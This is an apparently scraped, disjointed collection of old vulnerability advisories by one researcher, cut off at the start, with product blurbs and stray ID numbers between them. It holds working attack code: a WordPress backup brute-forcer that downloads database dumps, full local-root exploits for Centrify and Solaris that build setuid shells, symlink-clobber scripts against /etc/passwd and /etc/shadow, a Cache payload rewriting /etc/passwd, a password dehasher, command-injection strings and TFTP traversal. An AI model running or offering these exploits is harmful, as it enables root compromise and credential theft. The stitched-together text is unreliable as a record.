Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
char string[16] = "0123456789abcdef";
int x, y, z, a, b;
for (x = 0; x < 16; x++)
for (y = 0; y < 16; y++)
for (z = 0; z < 16; z++)
for (a = 0; a < 16; a++)
for (b = 0; b < 16; b++)
printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
string[a], string[b]);
return(0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi
if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching....";
for x in `cat rainbow`; do
CPATH="http://$1/wp-content/backup-$x/";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo $x > found.txt;
break; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=6;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi
# Now that we have the directory lets try to locate the database backup file.
K=999;
for y in `seq -w 0 999`; do
CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Database backup $CPATH Found";
echo "[+] Received $RESULT";
wget $CPATH
exit; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=2;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
Xitami is a Web and FTP server, originally developed by iMatix Corporation as a free, open-source product from 1996 to 2000. It ran as a single process with a small footprint. It was not as fast as the fastest servers but scaled well. It supported several web application protocols and was very portable. It also had a web interface to configure the web/FTP server.
20195
Webbynode Deployment Gem
100920
OCE 9600 plotter is a printing hardware device
Netscape is a common web browser available for multiple operating systems.
A ruby wrapper for ImageMagick or GraphicsMagick command line. Tested on both Ruby 1.9.2 and Ruby 1.8.7.
91231
Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications.
91552 91551 91553 78219
Lynx is a text browser for the World Wide Web
The following url triggers the bug: [larryc@harod ~ $] lynx http://lwc%d%d:hsVd632k@vapid.dhs.org/bleh:80 Results in the following logged to syslog. Dec 25 23:11:00 vapid lynx[5160]: http://lwc-1077939384134744128:******@vapid.dhs.org/bleh:80 Fix line 7995: --syslog (LOG_INFO|LOG_LOCAL5, buf); +syslog (LOG_INFO|LOG_LOCAL5,"%s", buf);
97554
Ruby command line wrapper for MySQL.
108579
Lipsiadmin is a new revolutionary admin for your projects. Lipsiadmin is based on Ext Js 3+. framework (with prototype adapter) and is ready for Rails 2.+
Gem for interacting with the API of lingq.com. It's a language learning website, and it's pretty useful, but I want to be able to work on my flashcards offline. This gem is being written to be included in a desktop client (and maybe eventually a mobile client), but will certainly still be useful as a standalone api wrapper for other projects that want to interact with Lingq.com
108585
Ruport is a powerful report generation engine that allows users to generate custom ERb templates and easily query various forms of SQL databases via DBI. It provides helper methods and utilities to generate professional reports quickly and cleanly.
108581
Easily interface with the Longman Dictionary of Contemporary English API from Ruby
91870
A small gem which provides a secure method of logging into the GATech LAWN network.
108576
These are the common recipes we've been using here at The Kompanee. Packaged as a gem.
108593
A gem to ease generating image previews (thumbnails) of various files.
92228
kCapistrano is an open source tool for running scripts on multiple servers. It’s primary use is for easily deploying applications. While it was built specifically for deploying Rails apps, it’s pretty simple to customize it to deploy other types of applications. This package is a deployment “recipe” to work with symfony (both 1 and 2) applications. This is a fork to make working with our deployment system more easy.
108572 108571
Splits documents up into pdf files.
92117
SSH toolbox to make running logs, sync, cache commands easier for a given rails app
108573
Lightweight content management system for middle and small teams.
108530 108529
JSpec is a minimalistic JavaScript behavior driven development framework, providing simple installation, extremely low learning curve, absolutely no pollution to core prototypes, async request support, and incredibly sexy syntax, tons of matchers and much more.
Midikeys is a sound editing program for SGI IRIX 6.x.
8515
InstallAnywhere (www.zerog.com) is a software framework that simplifies software installation on multiple client and server platforms. This software is utilized by such vendors like LimeWire (www.limewire.org). During execution this software insecurely creates two file in /tmp that can be used to clobber system files through symlink attacks. During the creation of one file a race condition exists to determine the filename the other requires no guesswork.
8236
The infiniband diagnostic utility.
90926
IBM Informix Dynamic Server (IDS) is a strategic data server in the IBM Information Management Software portfolio that provides blazing online transaction processing (OLTP) performance, legendary reliability, and nearly hands-free administration to businesses of all sizes. IDS 10 offers significant improvements in performance, availability, security, and manageability over previous versions, including patent-pending technology that virtually eliminates downtime and automates many of the tasks associated with deploying mission-critical enterprise systems.
29349 29348
Upload an image to Gyazo.com.
108563
GNMS is a graphical tool used to monitor state of network elements.
108594
Dragonfly is an on-the-fly Rack-based image handling framework. It is suitable for use with Rails, Sinatra and other web frameworks. Although it's mainly used for images, it can handle any content type.
96798
flickrcaptionr is a gem which lets you easily retrieve images (from flickr and other sources), resize them (cropping etc as desired), and overlay classic "image macro" text on them. It can be used as a web service, command-line tool or as a library in your application.
Needs PoC
A ruby wrapper for swftool command line tool. http://www.swftools.org/ Flash tool is small and mini tool for creating swf files from pdfs, pictures and fonts and parsing data from flash files.
90829
The PrimeBase Database Server is a relational Database Management System (DBMS) for Mac, UNIX and Windows platforms. The PrimeBase Database Server supports all common database access standards (PBT, SQL, ODBC, JDBC, PHP, Perl, RealBasic, EOF and DAL) and protocols (TCP/IP, Shared Memory and Appletalk)
2259 6219
Plaintext User Stories Parser supporting native programming languages. Especially Objective-C
nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
The above will pop up a java script alert in other gem users browser.
96975
curl API for ruby.
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")
larry@underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)
91230
Converts Email to PDF files.
93395
MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available.
root@pangea:/home/done/tftpserver# tftp 192.168.0.26 tftp> get ../../etc/shadow Received 652 bytes in 0.0 seconds tftp> quit root@debian:/home/done/tftpserver# head shadow root:$1XXXXXXXXXXXXXXXXXXX:13046:0:99999:7:::
Tarantella, a supplier of Internet infrastructure software, has released Tarantella Enterprise 3, version 3.2, positioned as a managed, secure application access product that provides authorization, authentication, and accountability for enterprise systems. The software supplies integrated, managed, and secure access to server-based applications through a Web browser. This iteration of the Tarantella software focuses on security, performance, and network optimization while allowing fast and simple integration with existing corporate infrastructures.
Exploit There is no race condition here, just create the link. [lwc@misery] ln -s /etc/passwd /tmp/spinning Wait until root is done installing... [lwc@misery] ls -l /etc/passwd - -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd
13949
Tarantella, a supplier of Internet infrastructure software, has released Tarantella Enterprise 3, version 3.2, positioned as a managed, secure application access product that provides authorization, authentication, and accountability for enterprise systems. The software supplies integrated, managed, and secure access to server-based applications through a Web browser. This iteration of the Tarantella software focuses on security, performance, and network optimization while allowing fast and simple integration with existing corporate infrastructures.
There is a race condition between when gunzip is extracted and used during installation. At which time a malicious local user could inject code to compromise the system quickly. $ echo "#!/bin/sh" > /tmp/test.sh $ echo "chmod 777 /etc/passwd" >> /tmp/test.sh $ cat /tmp/test.sh > /tmp/gunzip16152 I was able to change the permissions of /etc/passwd to 777 by performing the above as an non administrative user.
13949
Sonata is a teleconfrencing solution developed by Voyant Technologies. This advisory concerns the Sonata application server and bridge componet of the Sonata package. The application server is an Ultra Sparc 5 running Solaris 2.x as required by Voyant technologies. The bridge is an IBM PC running OS/2 Warp. These hosts are usually built in house by Voyant personnel and installed at customer locations by a field engineer.
$ cd /opt/TK/tk4.1/library/demos $ id uid=60001(nobody) gid=60001(nobody) $ ./doroot id uid=60001(nobody) gid=60001(nobody) euid=0(root) $ ls -l doroot rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot
1694
Sonata is a teleconfrencing solution developed by Voyant Technologies. This advisory concerns the Sonata application server and bridge componet of the Sonata package. The application server is an Ultra Sparc 5 running Solaris 2.x as required by Voyant technologies. The bridge is an IBM PC running OS/2 Warp. These hosts are usually built in house by Voyant personnel and installed at customer locations by a field engineer.
I. Application Server, Solaris 2.x By using available default services on the host an attacker can enumerate accounts. Using this easily obtainable account information combined with poor password selection and weak file permissions a remote attacker can gain root access. The passwords guessed are the default for all installations of Sonata. By default xhost authentication is disabled allowing a remote attacker to log key strokes and capture screen shots of the X console. II. Bridging Server, OS/2 Warp. These default passwords are also re-used on the bridging host (OS/2). Which has telnet enabled for remote administration. I am not going to detail the exploit because the methods used to access these systems are only the most basic information gathering techniques one would use to audit a host.
91319
Solaris Sparc patch cluster January 2013.
If the following is run:
while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done
during patch installation you can get /etc/shadow world writeable.
Vladz suggested:
Another approach to exploit this is to place your evil command in a file called /tmp/BIND_UPGRADE.new, and loop the move command.
$ while ! mv /tmp/BIND_UPGRADE.new /tmp/BIND_UPGRADE 2>/dev/null; do continue; done
or in C:
while (rename("/tmp/BIND_UPGRADE.new", "/tmp/BIND_UPGRADE") != 0) continue;
I am telling this because I think that moving a file takes less syscalls (one at least) than a "echo string >> file" that open(), write() and close() the file.
89243
Solaris Patch Cluster for SPARC systems March 2013.
# A simple attack in /tmp $ cd /tmp $ ln -s /etc/shadow CLEANUP #Will over write the contents of /etc/shadow.
Through the use of symlinking temporary files created by /usr/bin/catman upon execution by root a local user can clobber root owned files.
#!/usr/local/bin/perl -w
# The problem is catman creates files in /tmp insecurly. They are based on the
# PID of the catman process, catman will happily clobber any files that are
# symlinked to that file.
# The idea of this script is to create a block of symlinks to the target file # with the current PID as a starting point. Depending on what load your # system has this creates 1000 files in /tmp as sman_$currentpid + 1000.
# The drawback is you would have to know around when root would be executing
# catman.
# A better solution would be to monitor for the catman process and create the
# link before catman creates the file. I think this is a really small window
# however. This worked on a patched Solaris 2.7 box (August 2000 patch # cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
# 11/21/2000 Vapid Labs.
# http://vapid.dhs.org
$clobber = "/etc/passwd";
#file to clobber $X=getpgrp();
$Xc=$X;
#Constant
$Y=$X+1000;
#Constant
while($X < $Y) {
print "Linking /tmp/sman_$X to $clobber :";
# Change $clobber to what you want to clobber.
if (symlink ($clobber, "/tmp/sman_$X")) {
print "Sucess\n";
} else
{
print "failed, Busy system?\n";
}
$X=$X+1;
}
#Watch /tmp and see if catman is executed in time.
while(1) {
$list = "/usr/bin/ls -l /tmp | grep sman|grep root |";
open (list,$list) or "die cant open ls...\n";
while() {
@args = split "_",$_;
chop ($args[1]);
if ($args[1] >= $Xc && $args[1] <= $Y)
{
print "Looks like pid $args[1] is the winner\n cleaning....\n";
`/usr/bin/rm -f /tmp/sman*`;
exit(1);
}
}
}
6024
If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.
#!/bin/sh
#Larry W. Cashdollar, local root for Solaris x86 during patching
#10/4/2013 Tested on Cluster 9/30/2013
# larry@s0l4r1s:~$ ./disk_exp.sh
# [+] Creating evil shell
# [+] Hope you've got gcc on here, compiling...
# [+] Waiting for root shell
# [+] Tada!
# # id
# uid=0(root) gid=0(root)
echo "[+] Creating evil shell"
cat << EOF > r00t.c
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
setreuid (0, 0);
setregid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}
EOF
echo "[+] Hope you've got gcc on here, compiling..."
gcc r00t.c -o /tmp/r00t
mkdir -p /tmp/diskette_rc.d/
echo "#!/bin/sh" > /tmp/diskette_rc.d/rcs9.sh
echo "chown root:root /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
echo "chmod +s /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
chmod +x /tmp/diskette_rc.d/rcs9.sh
echo "[+] Waiting for root shell"
until [ -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t
95017
SawMill is a site log statistics package for UNIX, Windows and MacOS.
/*Dehash password for Sawmill admin account.
Larry W. Cashdollar
lwc@vapid.dhs.org
http://vapid.dhs.org
usage ./decrypt cyphertext
*/
#include <stdio.h>
char alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|"; char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";
int
main (int argc, char **argv)
{
int x, y;
char cypher[128];
strncpy (cypher, argv[1], 128);
for (x = 0; x < strlen (cypher); x++) {
for (y = 0; y < strlen (encode); y++)
if (cypher[x] == encode[y]){
printf ("%c", alpha[y]);
break;
}
}
printf("\n\"+\" could also be a space [ ]\n");
}
352 353
A set of utility classes to extract meta data from different file types.
90717
Transfer files between Android devices and computers without a USB cable and Windows software driver. Transfer files to and from your Android device over the Internet. Use Windows Explorer to transfer files between your Android device and your computer by drag and drop. You can add additional users with read only permission for download, and read and write permission for both upload and download."
Edit the users.properties file and re-upload. Connected to 192.168.0.29. 220 Service ready for new user. Name (192.168.0.29:larry): android 331 User name okay, need password for android. Password: 230 User logged in, proceed. Remote system type is UNIX. ftp> cd ftpConfig 250 Directory changed to /ftpConfig ftp> ls 229 Entering Passive Mode (|||49825|) 150 File status okay; about to open data connection. -rw------- 1 user group 679 Sep 7 16:37 users.properties 226 Closing data connection. ftp> get users.properties local: users.properties remote: users.properties 229 Entering Passive Mode (|||59616|) 150 File status okay; about to open data connection. 100% |********************************************| 695 9.60 MiB/s --:-- ETA 226 Transfer complete. 695 bytes received in 00:00 (121.85 KiB/s) ftp> If we take a look at the users.properties file: #Generated file - don't edit (please) #Sat Sep 07 16:13:44 EDT 2013 ftpserver.user.android.enableflag=true ftpserver.user.admin.maxloginnumber=0 ftpserver.user.android.writepermission=true ftpserver.user.android.idletime=0 ftpserver.user.admin.homedirectory=/mnt/sdcard <-change to / ftpserver.user.admin.writepermission=true ftpserver.user.admin.maxloginperip=0 ftpserver.user.android.homedirectory=/sdcard ftpserver.user.admin.userpassword=21232F297A57A5A743894A0E4A801FC3 <- replace with 23594328\:070A6394BF17CD0A401F12ACC021714F 'android' password [1] ftpserver.user.admin.downloadrate=0 ftpserver.user.admin.enableflag=true ftpserver.user.admin.idletime=0 ftpserver.user.admin.uploadrate=0 ftpserver.user.android.userpassword=23594328\:070A6394BF17CD0A401F12ACC021714F upload file as android/android user to ftpConfig/users.properties The next time the ftp server is started (on/off button in app interface) you can login as admin. login as admin/android ftp> user admin 331 User name okay, need password for admin. Password: 230 User logged in, proceed. Remote system type is UNIX. ftp> dir 229 Entering Passive Mode (|||52585|) 150 File status okay; about to open data connection. dr-x------ 3 user group 0 Jul 11 20:09 acct d--x------ 3 user group 0 Aug 17 09:09 cache d--x------ 3 user group 0 Jul 11 20:09 config dr-x------ 3 user group 0 Dec 31 1969 d d--x------ 3 user group 0 Sep 16 2012 data dr-x------ 3 user group 0 Jul 11 20:15 dev d--x------ 3 user group 0 Sep 2 14:07 dropbox dr-x------ 3 user group 0 Mar 29 13:48 etc dr-x------ 3 user group 0 Jul 11 20:09 mnt dr-x------ 3 user group 0 Dec 31 1969 proc d--x------ 3 user group 0 Feb 26 2013 root d--x------ 3 user group 0 Dec 31 1969 sbin drwx------ 3 user group 0 Sep 7 15:09 sdcard dr-x------ 3 user group 0 Jul 11 20:09 sys dr-x------ 3 user group 0 Mar 29 13:49 system dr-x------ 3 user group 0 Mar 29 13:49 vendor -r-------- 1 user group 118 Dec 31 1969 default.prop ---------- 1 user group 94200 Dec 31 1969 init ---------- 1 user group 1677 Dec 31 1969 init.goldfish.rc ---------- 1 user group 11658 Dec 31 1969 init.omap4430.rc ---------- 1 user group 14869 Dec 31 1969 init.rc -r-------- 1 user group 0 Dec 31 1969 ueventd.goldfish.rc -r-------- 1 user group 840 Dec 31 1969 ueventd.omap4430.rc -r-------- 1 user group 4203 Dec 31 1969 ueventd.rc 226 Closing data connection. ftp> Tested on kindle fire & droid bionic. [1] MD5 of admin, http://www.md5-hash.com/md5-hashing-decrypt/21232f297a57a5a743894a0e4a801fc3 but didn't allow me to login when I used admin/admin.
97621
ftpd is a pure Ruby FTP server library. It supports implicit and explicit TLS, passive and active mode, and most of the commands specified in RFC 969. It an be used as part of a test fixture or embedded in a program.
./ftpd-0.2.1/lib/ftpd/disk_file_system.rb
The problem code is below
204 Ls interface used by List and NameList 205
206 module Ls
207
208 def ls(ftp_path, option)
209 path = expand_ftp_path(ftp_path)
210 dirname = File.dirname(path)
211 filename = File.basename(path)
212 command = [
213 'ls',
214 option,
215 filename, <-- ;cmd inject
216 '2>&1',
217 ].compact.join(' ')
218 if File.exists?(dirname) <- file has to exist to exec ls command
219 list = Dir.chdir(dirname) do
220 `{command}` <-- exec?
90784
A set of utility classes to extract meta data from different file types
91450
A simple API for creating and finding sets of data in your database, built on ActiveRecord.
108582
A simple API for creating and finding sets of data in your database, built on ActiveRecord.
108583
Rails generators that make it easy to spin up a CI instance in the cloud. Formerly known as 'Lobot'.
touch /tmp/perlbrew-installer echo "id >/tmp/foo" >> /tmp/perlbrew-installer
108586
Centrify Server Suite secures the industry's broadest range of mission-critical servers from identity-related insider risks and outsider attacks, making security and regulatory compliance repeatable and sustainable. The solution leverages existing Active Directory infrastructure to centrally manage authentication, access controls, privileged identities, policy enforcement and compliance for on-premises and cloud resources.
So our quick dirty exploit:
larry@h0g:/tmp$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0 ; done
Will get us our command executed:
larry@h0g:/tmp$ ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow larry@h0g:/tmp$
It might work creating the file centrify.cmd.UID, then monitoring it for having the execute bit set with inotify (IN_ATTRIB). When the execute bit is set write our malicious command to the file as it about to be executed by root.
/*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
Centrify released a fix very quickly - nice vendor response.
http://vapid.dhs.org/exploits/centrify_local_r00t.c
CVE-2012-6348 12/17/2012
http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
Greetings vladz, Thanks for the inotify & syscall technique.
This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php
Run the exploit and wait for administrator to analyse or deploysoftware
to the system.
larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0
[*] Launching attack against "centrify.cmd.0"
[+] Creating evil script (/tmp/evil)
[+] Creating target file (/bin/touch /tmp/centrify.cmd.0)
[+] Initialize inotify
[+] Waiting for root to launch "centrify.cmd.0"
[+] Opening root shell (/tmp/sh)
#
Larry W. Cashdollar
@_larry0
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <sys/inotify.h>
#include <fcntl.h>
#include <sys/syscall.h>
/*Create a small c program to pop us a root shell*/
int create_nasty_shell(char *file) {
char *s = "#!/bin/bash\n"
"echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
"cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
"chmod 4755 /tmp/sh;\n";
int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
write(fd, s, strlen(s));
close(fd);
return 0;
}
int main(int argc, char **argv) {
int fd, wd;
char buf[1], *targetpath, *cmd,
*evilsh = "/tmp/evil", *trash = "/tmp/trash";
if (argc < 2) {
printf("Usage: %s <target file> \n", argv[0]);
return 1;
}
printf("[*] Launching attack against \"%s\"\n", argv[1]);
printf("[+] Creating evil script (/tmp/evil)\n");
create_nasty_shell(evilsh);
targetpath = malloc(sizeof(argv[1]) + 6);
cmd = malloc(sizeof(char) * 32);
sprintf(targetpath, "/tmp/%s", argv[1]);
sprintf(cmd,"/bin/touch %s",targetpath);
printf("[+] Creating target file (%s)\n",cmd);
system(cmd);
printf("[+] Initialize inotify\n");
fd = inotify_init();
wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);
printf("[+] Waiting for root to change perms on \"%s\"\n", argv[1]);
syscall(SYS_read, fd, buf, 1);
syscall(SYS_rename, targetpath, trash);
syscall(SYS_rename, evilsh, targetpath);
inotify_rm_watch(fd, wd);
printf("[+] Opening root shell (/tmp/sh)\n");
sleep(2);
system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
return 0;
}
88343
$ nobody> ln -s /etc/shadow adcheckDMoutput # ls -l /etc/shadow -r-------- 1 root root 3999 Dec 3 14:56 /etc/shadow /etc/shadow has been overwritten with the contents of adcheckDMoutput, which is generated when software is pushed to a host via Deployment Manager. The 210 appended to the end of files in /tmp is the users UID number.
88166
Bootstrap a machine. Install packages, create a deploy user, upload authorized keys and deploy key. Uses RVM to install desired rubies, with patch support.
108575
Cache', the post-relational database for e-applications, is optimized for the tougher demands of Web applications. It delivers breakthrough performance for massively scalable Web applications. Its rapid application development environment with advanced object technology lets you operate at Internet speed. Cache's ultra-fast SQL outperforms relational systems 20X. And its multidimensional application and data server delivers lightning-fast performance.
Intersystems Cache local root exploit. Larry W. Cashdollar http://vapid.dhs.org
Because of poor default file and directory permissions a localuser can execute code as root via the cache CSP interpreter. <HR> Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.
filename -> cspexp.csp
<script language=Cache runat=server>
Set cdef=##class(%Library.File).%New("/etc/passwd")
Do cdef.Open("WSN")
Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
Do cdef.%Close()
</script>
Gem to create brbackup summary.
108901
Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance.
Local attackers can exploit this vulnerability to add or modify accounts in Interbase. The following C program will generate hashed passwords that can be injected into admin.ib database.
/*Larry W. Cashdollar
Vapid Labs.
Borland Interbase 7.1 password creator. lwc@vapid.dhs.org */
#include <stdio.h>
#include <unistd.h>
#define SALT "9z"
int main (int argc, char *argv[]) {
char crypt1,crypt2;
if (!argv[1]) {
printf ("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n");
exit();
}
crypt1 =(char *) crypt (argv[1],SALT);
crypt2 =(char *) crypt (&crypt1[2],SALT);
printf("Double crypt() is: %s\n",crypt2);
printf("With out salt (as stored in isc4.gdb/admin.ib: %s\n",&crypt2[2]);
return(0);
}
4381
BaseSpace Ruby SDK is a Ruby based Software Development Kit to be used in the development of Apps and scripts for working with Illumina's BaseSpace cloud-computing solution for next-gen sequencing data analysis. The primary purpose of the SDK is to provide an easy-to-use Ruby environment enabling developers to authenticate a user, retrieve data, and upload data/results from their own analysis to BaseSpace.
101031
It is a clone of http://rubygems.org/gems/backup with checksum added.
108569
Backup is a RubyGem, written for UNIX-like operating systems, that allows you to easily perform backup operations on both your remote and local environments. It provides you with an elegant DSL in Ruby for modeling your backups. Backup has built-in support for various databases, storage protocols/services, syncers, compressors, encryptors and notifiers which you can mix and match. It was built with modularity, extensibility and simplicity in mind.
108578
Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to initiate contact with Oracle Support Services for common hardware component failures, reducing both the number of phone calls needed and overall phone time required. ASR also simplifies support operations by using electronic diagnostic data. Easily installed and deployed, ASR is completely controlled by you, the customer, to ensure security. ASR is applicable only for component faults. Not all component failures are covered, though the most common components (such as disk, fan, and power supplies) are covered.
[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done
root executes the asr command:
[root@oracle-os-lab01 bin]# ./asr
register OR register [-e asr-manager-relay-url]: register ASR
unregister : unregister ASR
show_reg_status : show ASR registration status
test_connection : test connection to Oracle
.
.
.
version : show asr script version
exit
help : display a list of commands
? : display a list of commands
asr>
/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722 root # cat /etc/shadow
id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1
Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1
Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1
Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0
Master=72
67 ACTIVE com.sun.svc.ServiceActivation_4.3.1
89823
as-1.0 is a command line interface to automate deployment and management of servers for https://www.anotherservice.com/.
ps -ef |grep runProgram
112683
Allows printing arabic to PDFs generated by prawn
myfile;id;.txt id would be passed to the command line and executed.
104365
The mysql root password can be read out of /tmp/my.cnf.#{target_host} if a local user waits to read that after it is written and before it is removed in line 394.
It is also possible to clobber files owned by the VladTheEnterprising user process via symlink attack because the my.cnf.#{target_host} doesn't have a randomly created filename.
If this Gem is used in the context of a rails application and the user is allowed to specify the target host command injection can occur at line 394 if special shell meta characters are injected like ; and &.
108728
Solaris Sparc Patch cluster
patches/137097-01/SUNWcsr/reloc/lib/svc/method/inetd-upgrade
lines :
72 inetdconf_entries_file=/tmp/iconf_entries.$$ 73
74 # Create sed script that prints out inetd.conf src line from inetconv generated 75 # manifest.
76 cat <<EOF > /tmp/inetd-upgrade.$$.sed 77 /propval name='source_line'/{
78 n
79 s/'//g
80 p
81 }
82 /from the inetd.conf(4) format line/{ 83 n
84 p
85 }
86 EOF
if 137097-01 is applied and changes need to be made to the inetd.conf file a malicious user can over write the contents of a root owned file with a simple script:
#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
@args = split " ", $_;
if (/inetd-upgrade/) {
print "Symlinking iconf_entries.$args[1] to $clobber\n";
symlink($clobber,"/tmp/iconf_entries.$args[1]");
exit(1);
}
}
}
89243
Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to initiate contact with Oracle Support Services for common hardware component failures, reducing both the number of phone calls needed and overall phone time required. ASR also simplifies support operations by using electronic diagnostic data. Easily installed and deployed, ASR is completely controlled by you, the customer, to ensure security. ASR is applicable only for component faults. Not all component failures are covered, though the most common components (such as disk, fan, and power supplies) are covered.
I was able to inject my own cronjob in as root with the following simple PoC: $ while (true) ;do echo "* * * * * /tmp/rootme" >> /tmp/crontab_edit; done [root@oracle-lnx-lab02 ~]# crontab -l 0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1 * * * * * /tmp/rootme <--- prepended and contains our malicious shell/binary, see exploit above. ##Cronjob entry for ASR Auto Rules Update 7 3 * * * /opt/SUNWswasr/bin/update_rules.sh The uninstall script is just as sloppy: [C] F /tmp/asrtab.?? [U] F /tmp/asrtab.?? [C] F /tmp/asrtab.??? [U] F /tmp/asrtab.??? [C] F /tmp/asrtab.??? [U] F /tmp/asrtab.??? [D] F /tmp/asrtab.?? did they mean to use $$ for process Pid?
89823
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
none